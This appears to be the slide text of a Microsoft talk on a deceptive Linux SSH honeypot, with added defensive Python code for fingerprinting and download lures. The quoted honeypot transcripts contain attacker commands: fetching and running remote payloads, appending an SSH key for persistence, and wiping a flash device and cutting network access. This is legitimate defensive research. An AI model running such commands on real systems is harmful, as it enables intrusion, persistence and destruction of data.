Ross Bevington, Microsoft
In ‘The Matrix’, sentient machines subdue the population by developing a highly sophisticated simulation. High-interaction honeypots are a lot like The Matrix: designed to convince an attacker to execute an attack so we can monitor them. But these honeypots are flawed!
Attackers are continually adapting in order to evade our defenses - meaning that it’s often not enough to just set up a honeypot and watch the results roll in. Is a new approach better?
Did you know that 40% of IaaS VMs in Azure are Linux? For Microsoft to protect itself and its customers Linux is a priority.
At MSTIC we’ve developed a new type of Linux honeypot that allows us to deceive and control the behavior of an attacker. We are using this to understand the person behind the attack, examining them as they examine us. Using these techniques, we are able to better track the person behind the threat, build better protections and ultimately protect more Linux users - whether they are using Azure or not.
In this presentation I’ll show some of the successes of running a Matrix-like environment, failures where a glitch was spotted, as well as deception approaches that could be applied to other domains. Finally, I’ll show how easy it is to leverage Azure’s big data capabilities to build and ultimately query all this data at scale, as well as how you can immediately reap the benefits of this work by connecting your Linux box to Azure Security Center.
4. [Chart of command frequency seen by the honeypot; labels as extracted: 1500 identical commands; all the commands typed in less than 500 times; real people; the biggest bots (MIRAI etc); Raspberry PI botnet attacks]
5. Anatomy of a Linux attack
1. Exploit and immediate action
2. Brute force and immediate action
3. Brute force creds…move to different infrastructure…and action
• Coin mining is extremely popular
7. What is deception?
• Emerging area of InfoSec
• Usually centred around the human behind the attack
• Has actually been around a long time
8. Honeypots
• Standard technique to study attackers for many years
• Low – dumb listener / just log network connections
• Medium – emulate key services
• High – actual OS
9. Honeypots are broken!
• Relatively easy to spot a honeypot
• Lots of ports, Shodan, odd routes to the Internet
• Honeypots tell you about an attack but not the attacker
• Do we care about the attack or the attacker?
• Deception is usually used for alerting, can we use it for tracking?
12. Hybrid
• Provide an environment that appears to be legitimate
• Take the best of low / medium interaction honeypots
• Add faults to cause an attacker to take alternative actions
• Faults are targeted to collect information we want
• New IPs, files, URLs etc
• Combine with traditional honeypots to see the outcome of an attack
18. These are your tools
• Lies
• Persuasion
• Mimicry
• Distraction
• Traps & Decoys
• Lures & Breadcrumbs
• Everything society told you not to do!
19. Threat model
• Not bots
    • Just need a good simulation
• Not state / APT
    • Simulation won’t be good enough
    • High end actors are targeted in their attacks, won’t find us etc
• Middle ground
    • Real people, script kiddies
22. How is it implemented?
• 100% C# SSH implementation with Bash/Linux simulator on top
• Can PuTTY, SFTP & SCP, Docker, MySQL (and more)
• Logs all TCP/SYN for trends
• 3 attempts to login, successful logins are cached
• Kernel & OS is randomised
• Results are canned or coded in C#
• 100% simulation, nothing is ever executed
24. Format data as JSON, code on GitHub to upload, query in NRT
25. Listening carefully
• SSH protocol is complex
• It’s remote access, it’s a proxy, it’s file transfer
• Bit like SSL/TLS, you start by negotiating crypto
• Client/server say what algorithms they support
• Messages are passed from client to server and responded to
• Lots of extensions (such as PuTTY ones)
26. What do we get by listening hard?
• The client sends machine specific data to the server
• ciphers, agent strings, supported modes, terminal size
• Environment variables (really, we see locales)
• The first packet comes from the attacker’s machine
• This has some magic fields: TTL, Window size, TCP timestamp
27. And the point of all this?
• Can use sources of entropy to build a fingerprint & track across infrastructure
• We can work out
• Attackers real OS
• How deep they are in a network
• How long their machine has been up (highly unreliable)
• Can compare real OS to the SSH agent banner
• Maybe even look up identity!
• https://github.com/FiloSottile/whosthere
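As an added example (Python, not the honeypot’s C# code), this pulls the fingerprinting material slides 25–27 describe out of a connection: the name-lists a client advertises in SSH_MSG_KEXINIT (hashed HASSH-style), the agent banner, and the first packet’s TTL turned into an OS family and hop-count estimate. The KEXINIT sample is constructed, and the 64/128/255 initial-TTL mapping is the common heuristic rather than something the slides state.

```python
import hashlib
import struct
SSH_MSG_KEXINIT = 20
KEXINIT_FIELDS = ("kex", "hostkey", "enc_c2s", "enc_s2c", "mac_c2s", "mac_s2c",
                  "comp_c2s", "comp_s2c", "lang_c2s", "lang_s2c")

def build_kexinit(lists):
    """Encode a KEXINIT payload (RFC 4253 7.1) from name-lists; used only to
    construct sample client input here, so the 16-byte cookie is zeroed."""
    body = bytes([SSH_MSG_KEXINIT]) + b"\x00" * 16
    for key in KEXINIT_FIELDS:
        names = ",".join(lists.get(key, [])).encode("ascii")
        body += struct.pack(">I", len(names)) + names
    return body + b"\x00" + struct.pack(">I", 0)  # first_kex_packet_follows, reserved

def parse_kexinit(payload):
    """Decode the ten name-lists a client advertises in SSH_MSG_KEXINIT."""
    if payload[0] != SSH_MSG_KEXINIT:
        raise ValueError("not a KEXINIT message")
    off, out = 17, {}                              # 1-byte type + 16-byte cookie
    for key in KEXINIT_FIELDS:
        (n,) = struct.unpack_from(">I", payload, off)
        raw = payload[off + 4:off + 4 + n].decode("ascii")
        out[key] = raw.split(",") if raw else []
        off += 4 + n
    return out

def hassh(lists):
    """HASSH client fingerprint: MD5 over kex;enc_c2s;mac_c2s;comp_c2s."""
    joined = ";".join(",".join(lists[k]) for k in ("kex", "enc_c2s", "mac_c2s", "comp_c2s"))
    return hashlib.md5(joined.encode("ascii")).hexdigest()

def ttl_guess(observed_ttl):
    """Common heuristic: initial TTL 64/128/255 -> OS family; the difference = hops."""
    for initial, family in ((64, "Linux/Unix"), (128, "Windows"), (255, "BSD/other")):
        if observed_ttl <= initial:
            return family, initial - observed_ttl
    raise ValueError("TTL out of range")

def fingerprint(banner, kexinit_payload, observed_ttl):
    """One record per connection: what the banner claims vs. what TTL and KEXINIT say."""
    os_family, hops = ttl_guess(observed_ttl)
    return {"client": banner.split("-", 2)[2], "hassh": hassh(parse_kexinit(kexinit_payload)),
            "os_guess": os_family, "hops": hops}

SAMPLE_LISTS = {"kex": ["curve25519-sha256", "diffie-hellman-group14-sha256"],  # constructed
                "hostkey": ["ssh-ed25519"], "enc_c2s": ["aes128-ctr"], "enc_s2c": ["aes128-ctr"],
                "mac_c2s": ["hmac-sha2-256"], "mac_s2c": ["hmac-sha2-256"],
                "comp_c2s": ["none"], "comp_s2c": ["none"]}
SAMPLE = fingerprint("SSH-2.0-OpenSSH_7.6p1", build_kexinit(SAMPLE_LISTS), 52)
```

Two sessions from different IPs with the same HASSH and the same TTL-derived OS are a strong hint of one operator moving between boxes, which is the cross-infrastructure tracking the slide is after.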
29. Hybrid theory
• We want URLs
• Need to balance enumeration with attacker expectations
• Small wins & the rule of three
• Include reason why!
user@exploited:~$ wget 374.53.15.95/test.jpg -O a.out
Resolving baddomain.com (baddomain.com)... failed: Name or service not known.
user@exploited:~$ curl 374.53.15.95/test.jpg
curl: (22) The requested URL returned error: 403 Forbidden
user@exploited:~$ curl newdomain.com/test.jpg
user@exploited:~$ chmod +x a.out
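An added Python sketch (not the honeypot’s C# implementation) of the "rule of three" lure the transcript above shows: each download command is answered with a plausible, explained failure until the attacker has been refused twice, then the third attempt silently "succeeds", and every host and URL typed along the way is recorded. The attacker input is constructed; the failure wording follows what wget and curl really print.

```python
import re
URL_RE = re.compile(r"^(?:https?://)?([A-Za-z0-9][A-Za-z0-9.\-]*)(?::\d+)?(/\S*)?$")
REASONS = ("dns", "403")                # a different excuse each refusal
FAILURES = {                            # wording copied from the real tools
    ("wget", "dns"): "Resolving {host} ({host})... failed: Name or service not known.",
    ("curl", "dns"): "curl: (6) Could not resolve host: {host}",
    ("wget", "403"): "HTTP request sent, awaiting response... 403 Forbidden",
    ("curl", "403"): "curl: (22) The requested URL returned error: 403 Forbidden",
}
class DownloadLure:
    """Per-session state: sources the attacker revealed and how often we refused."""
    def __init__(self, max_refusals=2):
        self.max_refusals = max_refusals
        self.refusals = 0
        self.sources = []               # (tool, host, url) in the order revealed

    @staticmethod
    def _url(argv):
        """First non-option argument that looks like a host or URL."""
        for i, arg in enumerate(argv[1:], 1):
            if arg.startswith("-") or argv[i - 1] in ("-O", "-o"):
                continue                # skip options and the output filename
            m = URL_RE.match(arg)
            if m:
                return m.group(1), arg
        return None, None

    def handle(self, cmdline):
        """Simulated output for one typed command, or None if it is not a download."""
        argv = cmdline.split()
        if not argv or argv[0] not in ("wget", "curl"):
            return None
        host, url = self._url(argv)
        if host is None:
            return f"{argv[0]}: missing URL"
        self.sources.append((argv[0], host, url))   # the enumeration we wanted
        # Small wins: refuse at most max_refusals times, each with a plausible
        # stated reason, so the attacker tries another source instead of leaving.
        if self.refusals < self.max_refusals:
            reason = REASONS[self.refusals % len(REASONS)]
            self.refusals += 1
            return FAILURES[(argv[0], reason)].format(host=host)
        return ""                       # silent "success"; nothing is fetched or run

SESSION = DownloadLure()
SAMPLE_OUTPUT = [SESSION.handle(cmd) for cmd in (    # constructed attacker input
    "wget 374.53.15.95/test.jpg -O a.out", "curl 374.53.15.95/test.jpg",
    "curl newdomain.com/test.jpg",
)]
```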
30. Enrich existing data
• A lot of malware is uploaded in ZIP format
• ZIP spec doesn’t contain much machine specific metadata
• TAR does!
user@exploited:~$ unzip malware.zip
bash: unzip: command not found
user@exploited:~$ tar
tar: You must specify one of the `-Acdtrux' or `--test-label' options
Try `tar --help' or `tar --usage' for more information.
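To make the ZIP-versus-TAR point concrete, here is an added Python example (not from the talk) that builds the same file as a constructed tar.gz and as a constructed zip, then reads back what each format recorded about the packing machine: tar carries the owner name, uid/gid, mode and mtime, while zip offers little more than a creating-OS byte and a DOS timestamp.

```python
import io
import tarfile
import zipfile

PAYLOAD = b"#!/bin/sh\necho hello\n"          # constructed stand-in for an uploaded tool

def tar_provenance(data):
    """Owner names/ids, mtime and mode that tar recorded on the packing machine."""
    records = []
    with tarfile.open(fileobj=io.BytesIO(data), mode="r:*") as tf:
        for m in tf.getmembers():
            records.append({"name": m.name, "uname": m.uname, "gname": m.gname,
                            "uid": m.uid, "gid": m.gid, "mtime": m.mtime, "mode": m.mode})
    return records

def zip_provenance(data):
    """All ZIP offers: creating OS family, a local timestamp, maybe a Unix mode."""
    records = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for i in zf.infolist():
            records.append({"name": i.filename, "create_system": i.create_system,
                            "date_time": i.date_time, "mode": i.external_attr >> 16})
    return records

def build_sample_tar():
    """Constructed archive as tar would write it for user 'dev' (uid 1000)."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tf:
        info = tarfile.TarInfo("source/main.sh")
        info.size, info.mode, info.mtime = len(PAYLOAD), 0o755, 1546300800
        info.uname, info.gname, info.uid, info.gid = "dev", "dev", 1000, 1000
        tf.addfile(info, io.BytesIO(PAYLOAD))
    return buf.getvalue()

def build_sample_zip():
    """The same file zipped: there are no owner fields to record."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        info = zipfile.ZipInfo("source/main.sh", date_time=(2019, 1, 1, 0, 0, 0))
        info.create_system = 3                  # 3 = Unix, 0 = FAT/Windows
        info.external_attr = 0o755 << 16        # Unix mode lives in the high 16 bits
        zf.writestr(info, PAYLOAD)
    return buf.getvalue()
```

A recurring uname/uid pair across uploads from different IPs is another handle for tracking the same operator.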
31. Tracking stolen data
• When attackers break in they nose around
• Might be looking for more creds
• Might be looking for data to steal
• Tokens used for years to signal when an attack has started
• https://canarytokens.org/generate
• We know we are under attack
32. How does it work?
• AWS credentials: using them triggers an email alert
• Visiting the URL triggers an email alert
• Hosting real files on the honeypot
37. user@billingserver:~$ uname -a
Linux billingserver 4.15.0-1013
user@billingserver:~$ cat link.txt
This is the link to the temp mobile site, creds paydbadmin:!pP543fddgZ@
Was so long I had to shorten it! DO NOT SHARE AROUND!!!
https://bit.ly/2oWZ2aL
user@billingserver:~$ wget XXXXXXXX.altervista.org/scan.jpg -O a.out
Resolving altervista.org (altervista.org)... failed: Name or service not known.
user@billingserver:~$ wget http://111.222.333.444/scan.jpg
Resolving 111.222.333.444 (111.222.333.444)... failed: Name or service not known.
user@billingserver:~$ history -c
user@billingserver:~$ wget https://raw.githubusercontent.com/XXXX/XXX/master/source.zip
user@billingserver:~$ unzip source.zip
unzip: cannot find libzip1.so - found libgz.so libbz.so
user@billingserver:~$ wget https://raw.githubusercontent.com/XXXX/XXX/master/source.tgz
user@billingserver:~$ tar xvf && cd source
user@billingserver:~$ gcc main.c && ./a.out
Segmentation fault
user@billingserver:~$
Broadcast message from root@exploited
The system is shutting down in 1m due to UPS failure
user@billingserver:~$ echo 'ssh-rsa AAAAB3NzaC1yc2EAA==' >> ~/.ssh/authorized_keys
ALL USERS MUST AGREE TO THE TERMS & CONDITIONS
user@billingserver:~$ chmod +x a.out && .a.out
40. From DigitalOcean to Romania: a real attack mounted by a real person
• Logs in from 198.199.70.152 & tries to install coinminer
• Downloads ‘link.txt’
• Visits link from 5.12.130.162 (IP is clean)
• I see an attacker visit the link from a Romanian IP
• I see info on an attack launched from a DigitalOcean IP & the Monero mining account
45. A glitch in the matrix! Attacker of the month
(Racist profanity removed!)
46. A glitch in the matrix!
user@exploited:~$ lscpu
…
user@exploited:~$ nproc
8
user@exploited:~$ clear
user@exploited:~$ sudo su
root@:~$ cat /etc/*-release
cat: /etc/*-release: No such file or directory
user@exploited:~$ sudo su
root@:~$ cat /proc/mounts
root@:~$ cat /dev/urandom | mtd_write mtd0 - 0 32768
root@:~$ iproute del default
root@:~$ iptables -A INPUT -j DROP
root@:~$ reboot
47. ‘White hat’ tries to fix my box
• Spare a thought for the attacker who ran ~60 commands and spent 10m trying to fix the honeypot’s DNS resolver!
50. tl;dr
• We use deception technology to protect customers
• Understand the attacker as well as the attack
• Use Azure Security Centre to start benefiting
• Big data? Use Log Analytics and Kusto
• Ross.Bevington@Microsoft.com